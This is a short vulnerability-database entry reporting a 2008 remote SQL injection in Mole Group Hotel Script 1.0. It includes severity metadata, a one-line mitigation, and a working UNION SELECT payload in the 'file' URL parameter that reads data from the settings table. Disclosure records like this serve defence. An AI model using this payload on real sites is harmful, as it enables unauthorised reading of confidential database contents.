vendor:
Mole Group Hotel Script
by:
t0pP8uZz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mole Group Hotel Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:mole_group:mole_group_hotel_script
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008
Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability
Mole Group Hotel Script suffers from a insecure mysql query in the 'file' variable. This can lead to malicous users arbitrary selecting confidential information from the database. The SQL injection can be found in the URL http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a SQL query.